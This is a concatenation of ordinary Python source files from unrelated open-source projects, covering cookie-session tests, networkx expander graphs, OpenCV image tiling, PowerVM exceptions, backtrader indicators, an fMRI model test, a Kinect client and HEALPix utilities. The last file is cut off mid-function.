strExpectedExpiration = (datetime.datetime.utcnow() + datetime.timedelta(days=90)).strftime("%a, %d-%b-%Y %H:%M:%S UTC")
if strExpectedExpiration == oCookie._ccookie__cookie['session']['expires']:
print('Setting with expiration of 3 month is working!\t\t\t\tSUCCESS')
else:
print('Setting with expiration of 3 month is not working!\t\t\tFAILED')
sys.exit(0)
oCookie = ccookie.ccookie(timedeltaMinutes = 60)
oCookie.createSession()
strExpectedExpiration = (datetime.datetime.utcnow() + datetime.timedelta(minutes=60)).strftime("%a, %d-%b-%Y %H:%M:%S UTC")
if strExpectedExpiration == oCookie._ccookie__cookie['session']['expires']:
print('Setting with expiration of 60 minutes is working!\t\t\tSUCCESS')
else:
print('Setting with expiration of 60 minutes is not working!\t\t\tFAILED')
sys.exit(0)
print('Test for different expiration times!\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test with individual keys!\n')
oInitialVector = Random.new().read(AES.block_size)
oKey = ''.join(SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(32))
oCookie = ccookie.ccookie(AESKey=oKey, AESInitialVector=oInitialVector)
oCookie.createSession()
if oCookie.getKey() == oKey:
print('Individual key correct set!\t\t\t\t\t\tSUCCESS')
else:
print('Individual key not correct set!\t\t\t\t\t\tFAILED')
sys.exit(0)
if oCookie.getInitialVector() == oInitialVector:
print('Individual vector correct set!\t\t\t\t\t\tSUCCESS')
else:
print('Individual vector not correct set!\t\t\t\t\tFAILED')
sys.exit(0)
print('Test with indiviual keys!\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test for Cookie Output.')
strCookieOutput = oCookie.getCookie().output()
print('Cookie output: ' + strCookieOutput)
if strCookieOutput is None:
print('No Cookie output available!\t\t\t\t\t\tFAILED')
sys.exit(0)
else:
print('Cookie output available!\t\t\t\t\t\tSUCCESS')
print('Salted session ID tests FINISHED')
# ===== SpaceGroupUCL/qgisSpaceSyntaxToolkit :: esstoolkit/external/networkx/generators/expanders.py (license: gpl-3.0) =====
"""Provides explicit constructions of expander graphs.
"""
import itertools
import networkx as nx
__all__ = ["margulis_gabber_galil_graph", "chordal_cycle_graph", "paley_graph"]
# Other discrete torus expanders can be constructed by using the following edge
# sets. For more information, see Chapter 4, "Expander Graphs", in
# "Pseudorandomness", by Salil Vadhan.
#
# For a directed expander, add edges from (x, y) to:
#
# (x, y),
# ((x + 1) % n, y),
# (x, (y + 1) % n),
# (x, (x + y) % n),
# (-y % n, x)
#
# For an undirected expander, add the reverse edges.
#
# Also appearing in the paper of Gabber and Galil:
#
# (x, y),
# (x, (x + y) % n),
# (x, (x + y + 1) % n),
# ((x + y) % n, y),
# ((x + y + 1) % n, y)
#
# and:
#
# (x, y),
# ((x + 2*y) % n, y),
# ((x + (2*y + 1)) % n, y),
# ((x + (2*y + 2)) % n, y),
# (x, (y + 2*x) % n),
# (x, (y + (2*x + 1)) % n),
# (x, (y + (2*x + 2)) % n),
#
def margulis_gabber_galil_graph(n, create_using=None):
r"""Returns the Margulis-Gabber-Galil undirected MultiGraph on `n^2` nodes.
The undirected MultiGraph is regular with degree `8`. Nodes are integer
pairs. The second-largest eigenvalue of the adjacency matrix of the graph
is at most `5 \sqrt{2}`, regardless of `n`.
Parameters
----------
n : int
Determines the number of nodes in the graph: `n^2`.
create_using : NetworkX graph constructor, optional (default MultiGraph)
Graph type to create. If graph instance, then cleared before populated.
Returns
-------
G : graph
The constructed undirected multigraph.
Raises
------
NetworkXError
If the graph is directed or not a multigraph.
"""
G = nx.empty_graph(0, create_using, default=nx.MultiGraph)
if G.is_directed() or not G.is_multigraph():
msg = "`create_using` must be an undirected multigraph."
raise nx.NetworkXError(msg)
for (x, y) in itertools.product(range(n), repeat=2):
for (u, v) in (
((x + 2 * y) % n, y),
((x + (2 * y + 1)) % n, y),
(x, (y + 2 * x) % n),
(x, (y + (2 * x + 1)) % n),
):
G.add_edge((x, y), (u, v))
G.graph["name"] = f"margulis_gabber_galil_graph({n})"
return G
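# Hedged usage sketch (added; not part of networkx): on n^2 = 9 nodes the
# graph is 8-regular once self-loops and edge multiplicities are counted.
def _example_margulis():
    G = margulis_gabber_galil_graph(3)
    assert G.number_of_nodes() == 9
    assert all(d == 8 for _, d in G.degree())
    return G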
def chordal_cycle_graph(p, create_using=None):
"""Returns the chordal cycle graph on `p` nodes.
The returned graph is a cycle graph on `p` nodes with chords joining each
vertex `x` to its inverse modulo `p`. This graph is a (mildly explicit)
3-regular expander [1]_.
`p` *must* be a prime number.
Parameters
----------
p : a prime number
The number of vertices in the graph. This also indicates where the
chordal edges in the cycle will be created.
create_using : NetworkX graph constructor, optional (default=nx.Graph)
Graph type to create. If graph instance, then cleared before populated.
Returns
-------
G : graph
The constructed undirected multigraph.
Raises
------
NetworkXError
If `create_using` indicates directed or not a multigraph.
References
----------
.. [1] Theorem 4.4.2 in A. Lubotzky. "Discrete groups, expanding graphs and
invariant measures", volume 125 of Progress in Mathematics.
Birkhäuser Verlag, Basel, 1994.
"""
G = nx.empty_graph(0, create_using, default=nx.MultiGraph)
if G.is_directed() or not G.is_multigraph():
msg = "`create_using` must be an undirected multigraph."
raise nx.NetworkXError(msg)
for x in range(p):
left = (x - 1) % p
right = (x + 1) % p
# Here we apply Fermat's Little Theorem to compute the multiplicative
# inverse of x in Z/pZ. By Fermat's Little Theorem,
#
# x^p = x (mod p)
#
# Therefore,
#
# x * x^(p - 2) = 1 (mod p)
#
# The number 0 is a special case: we just let its inverse be itself.
chord = pow(x, p - 2, p) if x > 0 else 0
for y in (left, right, chord):
G.add_edge(x, y)
G.graph["name"] = f"chordal_cycle_graph({p})"
return G
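# Hedged sketch (added): the construction requires a prime, e.g. p = 11.
def _example_chordal_cycle():
    G = chordal_cycle_graph(11)
    assert G.number_of_nodes() == 11
    return G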
def paley_graph(p, create_using=None):
"""Returns the Paley (p-1)/2-regular graph on p nodes.
The returned graph is a graph on Z/pZ with edges between x and y
if and only if x-y is a nonzero square in Z/pZ.
If p = 1 mod 4, -1 is a square in Z/pZ and therefore x-y is a square if and
only if y-x is also a square, i.e the edges in the Paley graph are symmetric.
If p = 3 mod 4, -1 is not a square in Z/pZ and therefore either x-y or y-x
is a square in Z/pZ but not both.
Note that a more general definition of Paley graphs extends this construction
to graphs over q=p^n vertices, by using the finite field F_q instead of Z/pZ.
This construction requires to compute squares in general finite fields and is
not what is implemented here (i.e paley_graph(25) does not return the true
Paley graph associated with 5^2).
Parameters
----------
p : int, an odd prime number.
create_using : NetworkX graph constructor, optional (default=nx.Graph)
Graph type to create. If graph instance, then cleared before populated.
Returns
-------
G : graph
The constructed directed graph.
Raises
------
NetworkXError
If the graph is a multigraph.
References
----------
Chapter 13 in B. Bollobas, Random Graphs. Second edition.
Cambridge Studies in Advanced Mathematics, 73.
Cambridge University Press, Cambridge (2001).
"""
G = nx.empty_graph(0, create_using, default=nx.DiGraph)
if G.is_multigraph():
msg = "`create_using` cannot be a multigraph."
raise nx.NetworkXError(msg)
# Compute the squares in Z/pZ.
# Make it a set to uniquify (there are exactly (p-1)/2 squares in Z/pZ
# when is prime).
square_set = {(x ** 2) % p for x in range(1, p) if (x ** 2) % p != 0}
for x in range(p):
for x2 in square_set:
G.add_edge(x, (x + x2) % p)
G.graph["name"] = f"paley({p})"
return G
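# Hedged sketch (added): the Paley digraph on p = 13 nodes has out-degree
# (p - 1) / 2 = 6 at every node.
def _example_paley():
    G = paley_graph(13)
    assert all(d == 6 for _, d in G.out_degree())
    return G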
# ===== nkmk/python-snippets :: notebook/opencv_hconcat_vconcat_np_tile.py (license: mit) =====
import cv2
import numpy as np
im1 = cv2.imread('data/src/lena.jpg')
im2 = cv2.imread('data/src/rocket.jpg')
im_v = cv2.vconcat([im1, im1])
cv2.imwrite('data/dst/opencv_vconcat.jpg', im_v)
# True
im_v_np = np.tile(im1, (2, 1, 1))
cv2.imwrite('data/dst/opencv_vconcat_np.jpg', im_v_np)
# True
def vconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):
w_min = min(im.shape[1] for im in im_list)
im_list_resize = [cv2.resize(im, (w_min, int(im.shape[0] * w_min / im.shape[1])), interpolation=interpolation)
for im in im_list]
return cv2.vconcat(im_list_resize)
im_v_resize = vconcat_resize_min([im1, im2, im1])
cv2.imwrite('data/dst/opencv_vconcat_resize.jpg', im_v_resize)
# True
im_h = cv2.hconcat([im1, im1])
cv2.imwrite('data/dst/opencv_hconcat.jpg', im_h)
# True
im_h_np = np.tile(im1, (1, 2, 1))
cv2.imwrite('data/dst/opencv_hconcat_np.jpg', im_h_np)
# True
def hconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):
h_min = min(im.shape[0] for im in im_list)
im_list_resize = [cv2.resize(im, (int(im.shape[1] * h_min / im.shape[0]), h_min), interpolation=interpolation)
for im in im_list]
return cv2.hconcat(im_list_resize)
im_h_resize = hconcat_resize_min([im1, im2, im1])
cv2.imwrite('data/dst/opencv_hconcat_resize.jpg', im_h_resize)
# True
def concat_tile(im_list_2d):
return cv2.vconcat([cv2.hconcat(im_list_h) for im_list_h in im_list_2d])
im1_s = cv2.resize(im1, dsize=(0, 0), fx=0.5, fy=0.5)
im_tile = concat_tile([[im1_s, im1_s, im1_s, im1_s],
[im1_s, im1_s, im1_s, im1_s],
[im1_s, im1_s, im1_s, im1_s]])
cv2.imwrite('data/dst/opencv_concat_tile.jpg', im_tile)
# True
im_tile_np = np.tile(im1_s, (3, 4, 1))
cv2.imwrite('data/dst/opencv_concat_tile_np.jpg', im_tile_np)
# True
def concat_tile_resize(im_list_2d, interpolation=cv2.INTER_CUBIC):
im_list_v = [hconcat_resize_min(im_list_h, interpolation=cv2.INTER_CUBIC) for im_list_h in im_list_2d]
return vconcat_resize_min(im_list_v, interpolation=cv2.INTER_CUBIC)
im_tile_resize = concat_tile_resize([[im1],
[im1, im2, im1, im2, im1],
[im1, im2, im1]])
cv2.imwrite('data/dst/opencv_concat_tile_resize.jpg', im_tile_resize)
# True
# ===== shootstar/novatest :: nova/virt/powervm/exception.py (license: apache-2.0) =====
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import exception
class PowerVMConnectionFailed(exception.NovaException):
message = _('Connection to PowerVM manager failed')
class PowerVMFileTransferFailed(exception.NovaException):
message = _("File '%(file_path)s' transfer to PowerVM manager failed")
class PowerVMFTPTransferFailed(PowerVMFileTransferFailed):
message = _("FTP %(ftp_cmd)s from %(source_path)s to %(dest_path)s failed")
class PowerVMLPARInstanceNotFound(exception.InstanceNotFound):
message = _("LPAR instance '%(instance_name)s' could not be found")
class PowerVMLPARCreationFailed(exception.NovaException):
message = _("LPAR instance '%(instance_name)s' creation failed")
class PowerVMNoSpaceLeftOnVolumeGroup(exception.NovaException):
message = _("No space left on any volume group")
class PowerVMLPARAttributeNotFound(exception.NovaException):
pass
class PowerVMLPAROperationTimeout(exception.NovaException):
message = _("Operation '%(operation)s' on "
"LPAR '%(instance_name)s' timed out")
class PowerVMImageCreationFailed(exception.NovaException):
message = _("Image creation failed on PowerVM")
class PowerVMInsufficientFreeMemory(exception.NovaException):
message = _("Insufficient free memory on PowerVM system to spawn instance "
"'%(instance_name)s'")
class PowerVMInsufficientCPU(exception.NovaException):
message = _("Insufficient available CPUs on PowerVM system to spawn "
"instance '%(instance_name)s'")
class PowerVMLPARInstanceCleanupFailed(exception.NovaException):
message = _("PowerVM LPAR instance '%(instance_name)s' cleanup failed")
class PowerVMUnrecognizedRootDevice(exception.NovaException):
message = _("Unrecognized root disk information: '%(disk_info)s'")
# ===== joaduo/python-simplerpc :: simplerpc/expose_api/javascript/TemplatesCollector.py (license: bsd-3-clause) =====
# -*- coding: utf-8 -*-
'''
Simple RPC
Copyright (c) 2013, Joaquin G. Duo
'''
from simplerpc.base.SimpleRpcLogicBase import SimpleRpcLogicBase
from simplerpc.common.path import joinPath, splitPath
import os
from simplerpc.common.FileManager import FileManager
import fnmatch
class TemplatesCollector(SimpleRpcLogicBase):
'''
    Collects templates stored in the repository
to be used in the translation by the TranslationAstNode class.
'''
def __post_init__(self):
self.file_manager = FileManager(self.context)
def _getRepoPath(self, templates_set):
return joinPath(os.path.dirname(__file__), templates_set)
def _getTemplatesPaths(self, pattern, templates_set):
for root, _, files in os.walk(self._getRepoPath(templates_set),
followlinks=True):
for basename in files:
if fnmatch.fnmatch(basename, pattern):
filename = os.path.join(root, basename)
yield filename
def _buildNamespace(self, file_path, templates_set):
repo_split = splitPath(self._getRepoPath(templates_set))
namespace, _ = os.path.splitext(file_path)
namespace = splitPath(namespace)[len(repo_split):]
return '.'.join(namespace)
def collectBuiltIn(self, templates_set='javascript_templates'):
templates = dict()
for file_path in self._getTemplatesPaths('*.js', templates_set):
namespace = self._buildNamespace(file_path, templates_set)
template = self.file_manager.getTextFile(file_path)
templates[namespace] = template
return templates
def smokeTestModule():
from simplerpc.context.SimpleRpcContext import SimpleRpcContext
context = SimpleRpcContext('smoke test')
templates = TemplatesCollector(context).collectBuiltIn()
context.log(templates)
if __name__ == "__main__":
smokeTestModule()
# ===== mementum/backtrader :: backtrader/indicators/mabase.py (license: gpl-3.0) =====
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015-2020 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from ..utils.py3 import with_metaclass
from . import Indicator
class MovingAverage(object):
'''MovingAverage (alias MovAv)
A placeholder to gather all Moving Average Types in a single place.
Instantiating a SimpleMovingAverage can be achieved as follows::
sma = MovingAverage.Simple(self.data, period)
Or using the shorter aliases::
sma = MovAv.SMA(self.data, period)
or with the full (forwards and backwards) names:
sma = MovAv.SimpleMovingAverage(self.data, period)
sma = MovAv.MovingAverageSimple(self.data, period)
'''
_movavs = []
@classmethod
def register(cls, regcls):
if getattr(regcls, '_notregister', False):
return
cls._movavs.append(regcls)
clsname = regcls.__name__
setattr(cls, clsname, regcls)
clsalias = ''
if clsname.endswith('MovingAverage'):
clsalias = clsname.split('MovingAverage')[0]
elif clsname.startswith('MovingAverage'):
clsalias = clsname.split('MovingAverage')[1]
if clsalias:
setattr(cls, clsalias, regcls)
class MovAv(MovingAverage):
pass # alias
class MetaMovAvBase(Indicator.__class__):
# Register any MovingAverage with the placeholder to allow the automatic
# creation of envelopes and oscillators
def __new__(meta, name, bases, dct):
# Create the class
cls = super(MetaMovAvBase, meta).__new__(meta, name, bases, dct)
MovingAverage.register(cls)
# return the class
return cls
class MovingAverageBase(with_metaclass(MetaMovAvBase, Indicator)):
params = (('period', 30),)
plotinfo = dict(subplot=False)
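# Hedged sketch (added; not part of backtrader): any subclass of
# MovingAverageBase is auto-registered by the metaclass, so it becomes
# reachable through the MovingAverage/MovAv placeholder and its alias.
def _example_registration():
    class MyMovingAverage(MovingAverageBase):
        lines = ('mymav',)
        def next(self):
            period = self.p.period
            self.lines.mymav[0] = sum(self.data.get(size=period)) / period
    assert MovAv.MyMovingAverage is MyMovingAverage
    assert MovAv.My is MyMovingAverage  # 'MovingAverage' suffix stripped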
# ===== ThomasYeoLab/CBIG :: stable_projects/fMRI_dynamics/Kong2021_pMFM/part1_pMFM_main/scripts/CBIG_pMFM_step3_test_main.py (license: mit) =====
# /usr/bin/env python
'''
Written by Kong Xiaolu and CBIG under MIT license:
https://github.com/ThomasYeoLab/CBIG/blob/master/LICENSE.md
'''
import os
import numpy as np
import torch
import CBIG_pMFM_basic_functions_main as fc
import warnings
def CBIG_mfm_test_desikan_main(gpu_index=0):
'''
This function is to implement the testing processes of mean field
model.
The objective function is the summation of FC correlation cost and
FCD KS statistics cost.
Args:
gpu_index: index of gpu used for optimization
Returns:
None
'''
# Setting random seed and GPU
torch.cuda.set_device(gpu_index)
torch.cuda.manual_seed(1)
# Create output folder
input_path = '../output/step2_validation_results/'
output_path = '../output/step3_test_results/'
if not os.path.isdir(output_path):
os.makedirs(output_path)
# Setting hyper-parameters
n_set = 100
n_dup = 10
n_node = 68
vali_raw_all = np.zeros((3 * n_node + 1 + 8, 1))
for i in range(1, 11):
load_file = 'random_initialization_' + str(i) + '.csv'
load_path = os.path.join(input_path, load_file)
xmin = fc.csv_matrix_read(load_path)
index_mat = np.zeros((2, xmin.shape[1]))
index_mat[0, :] = i
index_mat[1, :] = np.arange(xmin.shape[1])
xmin = np.concatenate((index_mat, xmin), axis=0)
vali_raw_all = np.concatenate((vali_raw_all, xmin), axis=1)
vali_raw_all = vali_raw_all[:, 1:]
vali_index = np.argsort(vali_raw_all[7, :])
vali_sort_all = vali_raw_all[:, vali_index]
vali_sel_num = 10
i = 0
vali_sel = np.zeros((vali_raw_all.shape[0], vali_sel_num))
p = 0
p_set = np.zeros(vali_sel_num)
while i < vali_sel_num and p < vali_raw_all.shape[1]:
corr_t = np.zeros(vali_sel_num, dtype=bool)
corr_tr = np.zeros((vali_sel_num, 3))
for j in range(vali_sel_num):
w_corr = np.corrcoef(vali_sel[8:8 + n_node, j:j + 1].T,
vali_sort_all[8:8 + n_node, p:p + 1].T)
i_corr = np.corrcoef(
vali_sel[8 + n_node:8 + 2 * n_node, j:j + 1].T,
vali_sort_all[8 + n_node:8 + 2 * n_node, p:p + 1].T)
s_corr = np.corrcoef(vali_sel[9 + 2 * n_node:, j:j + 1].T,
vali_sort_all[9 + 2 * n_node:, p:p + 1].T)
corr_tr[j, 0] = w_corr[0, 1]
corr_tr[j, 1] = i_corr[0, 1]
corr_tr[j, 2] = s_corr[0, 1]
for k in range(vali_sel_num):
corr_t[k] = (corr_tr[k, :] > 0.98).all()
if not corr_t.any():
vali_sel[:, i] = vali_sort_all[:, p]
p_set[i] = p
i += 1
p += 1
result_save = np.zeros((3 * n_node + 1 + 11, vali_sel_num))
result_save[0:8, :] = vali_sel[0:8, :]
result_save[11:, :] = vali_sel[8:, :]
for j in range(vali_sel_num):
test_cost = np.zeros((3, n_set * 10))
for k in range(10):
arx = np.tile(vali_sel[8:, j:j + 1], [1, n_set])
total_cost, fc_cost, fcd_cost = fc.CBIG_combined_cost_test(
arx, n_dup)
test_cost[0, n_set * k:n_set * (k + 1)] = fc_cost
test_cost[1, n_set * k:n_set * (k + 1)] = fcd_cost
test_cost[2, n_set * k:n_set * (k + 1)] = total_cost
test_file = os.path.join(output_path,
'test_num_' + str(j + 1) + '.csv')
np.savetxt(test_file, test_cost, delimiter=',')
result_save[8, j] = np.nanmean(test_cost[0, :])
result_save[9, j] = np.nanmean(test_cost[1, :])
result_save[10, j] = np.nanmean(test_cost[2, :])
print('**************** finish top ' + str(j + 1) +
' test ****************')
test_file_all = os.path.join(output_path, 'test_all.csv')
np.savetxt(test_file_all, result_save, delimiter=',')
if __name__ == '__main__':
warnings.filterwarnings("ignore", category=RuntimeWarning)
CBIG_mfm_test_desikan_main()
# ===== coin-or/oBB :: obb/gcest.py (license: lgpl-3.0) =====
from __future__ import division
# Use the third order derivative tensor Gershgorin estimation method
def gcest(LT,UT,method):
# Get dimension
D = LT.shape[0]
# # Positivity/ Negativity tensor checks
# from numpy import all
# print('LT non-positive: %s') % all(LT <= 0)
# print('UT non-negative: %s') % all(UT >= 0)
#
# # Ediag check ef
# print('MA non-positive: %s') % all((UT+LT)/2 <= 0)
# print('RA non-negative: %s') % all((UT-LT)/2 >= 0)
# Gershgorin
# mRA = (UT-LT)/2. # radius tensor.
# mMA = (UT+LT)/2. # midpoint tensor
# for i in range(0,D):
# for j in range(0,D):
# for k in range(0,D):
# if((i==j)and(j==k)):
# mRA[i,j,k] = 0
# mMA[i,j,k] = LT[i,j,k]
# print('mMA non-positive: %s') % all(mMA <= 0)
# print('mRA non-negative: %s') % all(mRA >= 0)
#
# # lbH check (equivalent to Gersh like quad?)
# NRA = (LT-UT)/2.
# rs = (NRA.sum(axis=1)).sum(axis=1)
# A = (LT+UT)/2.
# for i in range(0,D):
# for j in range(0,D):
# for k in range(0,D):
# if((i==j)and(j==k)):
# A[i,j,k] = LT[i,j,k] + (rs[i] - NRA[i,j,k])
# print('lbH non-positive: %s') % all(A <= 0)
# Select estimation method (gc, c)
# Gershgorin for Tensors
if(method == 'gc'):
# Imports
from numpy import maximum, zeros
# Calculate max absolute value of bounds
VT = maximum(abs(LT),abs(UT))
# Get row plane sums
rs = (VT.sum(axis=1)).sum(axis=1)
# Tensor diagonal function
def diagt(T):
v = zeros(D)
for i in range(0,D):
v[i] = T[i,i,i]
return v
# Calculate lower bounds on Gershgorin disks
G = diagt(LT) - (rs-diagt(VT))
# Calculate Gershgorin lower bound
k = min(G)
# If k negative ok, if k positive need other bound
if(k < 0):
pass
#print('k ok, negative')
else:
#print('k positive, using other bound.')
k = (D**(-0.5))*k
return k
# Lh = norm_F(VT) so return -Lh
elif(method == 'c'):
# Imports
from numpy import maximum, sqrt, sum
# Calculate max absolute value of bounds
VT = maximum(abs(LT),abs(UT))
# Calculate frobenius norm of VT
return -sqrt(sum(sum(sum(VT ** 2))))
else:
raise RuntimeError('Method must be one of gc, c.')
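# Hedged usage sketch (added; not part of oBB): estimate a spectral lower
# bound for a random interval tensor with the Gershgorin ('gc') method.
def _example_gcest():
    from numpy.random import rand
    D = 4
    UT = rand(D, D, D)        # elementwise upper bounds
    LT = UT - rand(D, D, D)   # elementwise lower bounds, so LT <= UT
    return gcest(LT, UT, 'gc')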
# ===== Nander2/pypot_herkulex :: pypot/sensor/kinect/sensor.py (license: gpl-3.0) =====
"""
This code has been developed by Baptiste Busch: https://github.com/buschbapti
This module allows you to retrieve Skeleton information from a Kinect device.
It is only the client side of a zmq client/server application.
The server part can be found at: https://bitbucket.org/buschbapti/kinectserver/src
It used the Microsoft Kinect SDK and thus only work on Windows.
Of course, the client side can be used on any platform.
"""
import zmq
import numpy
import threading
from collections import namedtuple
from ...utils import Point3D, Point2D, Quaternion
torso_joints = ('hip_center', 'spine', 'shoulder_center', 'head')
left_arm_joints = ('shoulder_left', 'elbow_left', 'wrist_left', 'hand_left')
right_arm_joints = ('shoulder_right', 'elbow_right', 'wrist_right', 'hand_right')
left_leg_joints = ('hip_left', 'knee_left', 'ankle_left', 'foot_left')
right_leg_joints = ('hip_right', 'knee_right', 'ankle_right', 'foot_right')
skeleton_joints = torso_joints + left_arm_joints + right_arm_joints + left_leg_joints + right_leg_joints
class Skeleton(namedtuple('Skeleton', ('timestamp', 'user_id') + skeleton_joints)):
joints = skeleton_joints
Joint = namedtuple('Joint', ('position', 'orientation', 'pixel_coordinate'))
class KinectSensor(object):
def __init__(self, addr, port):
self._lock = threading.Lock()
self._skeleton = {}
self.context = zmq.Context()
self.sub_skel = self.context.socket(zmq.SUB)
self.sub_skel.connect('tcp://{}:{}'.format(addr, port))
        self.sub_skel.setsockopt(zmq.SUBSCRIBE, b'')
t = threading.Thread(target=self.get_skeleton)
t.daemon = True
t.start()
def remove_user(self,user_index):
with self._lock:
del self._skeleton[user_index]
def remove_all_users(self):
with self._lock:
self._skeleton = {}
@property
def tracked_skeleton(self):
with self._lock:
return self._skeleton
@tracked_skeleton.setter
def tracked_skeleton(self, skeleton):
with self._lock:
self._skeleton[skeleton.user_id] = skeleton
def get_skeleton(self):
while True:
md = self.sub_skel.recv_json()
msg = self.sub_skel.recv()
skel_array = numpy.fromstring(msg, dtype=float, sep=",")
skel_array = skel_array.reshape(md['shape'])
nb_joints = md['shape'][0]
joints = []
for i in range(nb_joints):
x, y, z, w = skel_array[i][0:4]
position = Point3D(x / w, y / w, z / w)
pixel_coord = Point2D(*skel_array[i][4:6])
orientation = Quaternion(*skel_array[i][6:10])
joints.append(Joint(position,orientation,pixel_coord))
self.tracked_skeleton = Skeleton(md['timestamp'], md['user_index'], *joints)
    def run(self):
        import cv2  # deferred import: OpenCV is only needed for this visualisation loop
        cv2.startWindowThread()
        while True:
            img = numpy.zeros((480, 640, 3))
            skeleton = self.tracked_skeleton
            if skeleton:
                for user, skel in skeleton.iteritems():
                    for joint_name in skel.joints:
                        x, y = getattr(skel, joint_name).pixel_coordinate
                        pt = (int(x), int(y))
                        cv2.circle(img, pt, 5, (255, 255, 255), thickness=-1)
                self.remove_all_users()
            cv2.imshow('Skeleton', img)
            cv2.waitKey(50)
        self.sub_skel.close()
        self.context.term()
if __name__ == '__main__':
import cv2
kinect = KinectSensor('193.50.110.177', 9999)
kinect.run()
| gpl-3.0 | 4,152,207,849,554,016,000 | 32.759259 | 104 | 0.579382 | false |
legacysurvey/pipeline | validationtests/quicksipManera3.py | 1 | 51044 | from math import *
import numpy as np
import healpy as hp
import astropy.io.fits as pyfits
import time
import matplotlib.pyplot as plt
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
import numpy.random
import os, errno
import subprocess
twopi = 2.*pi
piover2 = .5*pi
verbose = False
# ---------------------------------------------------------------------------------------- #
def quicksipVerbose(verb=False):
global verbose
verbose=verb
# Make directory
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
# Some unit definitions
arcsec_to_radians = 0.0000048481368111
degree_to_arcsec = 3600.0
# MarcM Global variable to debug
#nwrong = 0
# ---------------------------------------------------------------------------------------- #
# Write partial Healpix map to file
# indices are the indices of the pixels to be written
# values are the values to be written
def write_partial_map(filename, indices, values, nside, nest=False):
fitsformats = [hp.fitsfunc.getformat(np.int32), hp.fitsfunc.getformat(np.float32)]
column_names = ['PIXEL', 'SIGNAL']
# maps must have same length
assert len(set((len(indices), len(values)))) == 1, "Indices and values must have same length"
if nside < 0:
        raise ValueError('Invalid healpix map: wrong number of pixels')
firstpix = np.min(indices)
lastpix = np.max(indices)
npix = np.size(indices)
cols=[]
for cn, mm, fm in zip(column_names, [indices, values], fitsformats):
cols.append(pyfits.Column(name=cn, format='%s' % fm, array=mm))
if False: # Deprecated : old way to create table with pyfits before v3.3
tbhdu = pyfits.new_table(cols)
else:
tbhdu = pyfits.BinTableHDU.from_columns(cols)
# add needed keywords
tbhdu.header['PIXTYPE'] = ('HEALPIX','HEALPIX pixelisation')
if nest: ordering = 'NESTED'
else: ordering = 'RING'
tbhdu.header['ORDERING'] = (ordering, 'Pixel ordering scheme, either RING or NESTED')
tbhdu.header['EXTNAME'] = ('xtension', 'name of this binary table extension')
tbhdu.header['NSIDE'] = (nside,'Resolution parameter of HEALPIX')
tbhdu.header['FIRSTPIX'] = (firstpix, 'First pixel # (0 based)')
tbhdu.header['OBS_NPIX'] = npix
tbhdu.header['GRAIN'] = 1
tbhdu.header['OBJECT'] = 'PARTIAL'
tbhdu.header['INDXSCHM'] = ('EXPLICIT', 'Indexing: IMPLICIT or EXPLICIT')
tbhdu.writeto(filename,clobber=True)
subprocess.call("gzip -f "+filename,shell=True)
# ---------------------------------------------------------------------------------------- #
# Find healpix ring number from z
def ring_num(nside, z, shift=0):
# ring = ring_num(nside, z [, shift=])
# returns the ring number in {1, 4*nside-1}
# from the z coordinate
# usually returns the ring closest to the z provided
    # if shift = -1, returns the ring immediately north (of smaller index) of z
    # if shift = 1, returns the ring immediately south (of smaller index) of z
my_shift = shift * 0.5
# equatorial
iring = np.round( nside*(2.0 - 1.5*z) + my_shift )
if (z > 2./3.):
iring = np.round( nside * np.sqrt(3.0*(1.0-z)) + my_shift )
if (iring == 0):
iring = 1
# south cap
if (z < -2./3.):
iring = np.round( nside * np.sqrt(3.0*(1.0+z)) - my_shift )
if (iring == 0):
iring = 1
iring = int(4*nside - iring)
# return ring number
return int(iring)
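
# Hedged worked example for ring_num: in the RING scheme the equator
# (z = 0) maps to ring 2*nside and the poles to rings 1 and 4*nside-1.
# These checks are illustrative, not original tests.
def _example_ring_num():
    nside = 16
    assert ring_num(nside, 0.0) == 2 * nside         # equatorial ring
    assert ring_num(nside, 1.0) == 1                 # north polar cap
    assert ring_num(nside, -1.0) == 4 * nside - 1    # south polar cap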
# ---------------------------------------------------------------------------------------- #
# returns the z coordinate of ring ir for Nside
def ring2z(nside, ir):
fn = float(nside)
if (ir < nside): # north cap
tmp = float(ir)
z = 1.0 - (tmp * tmp) / (3.0 * fn * fn)
elif (ir < 3*nside): # tropical band
z = float( 2*nside-ir ) * 2.0 / (3.0 * fn)
else: # polar cap (south)
tmp = float(4*nside - ir )
z = - 1.0 + (tmp * tmp) / (3.0 * fn * fn)
# return z
return z
# ---------------------------------------------------------------------------------------- #
def ang2pix_ring_ir(nside,ir,phi):
# c=======================================================================
# c gives the pixel number ipix (RING)
# c corresponding to angles theta and phi
# c=======================================================================
z = ring2z (nside, ir)
z0=2.0/3.0
za = fabs(z)
if phi >= twopi:
phi = phi - twopi
if phi < 0.:
phi = phi + twopi
tt = phi / piover2#;// ! in [0,4)
nl2 = 2*nside
nl4 = 4*nside
ncap = nl2*(nside-1)#// ! number of pixels in the north polar cap
npix = 12*nside*nside
if za <= z0:# {
jp = int(floor(nside*(0.5 + tt - z*0.75)))#; /*index of ascending edge line*/
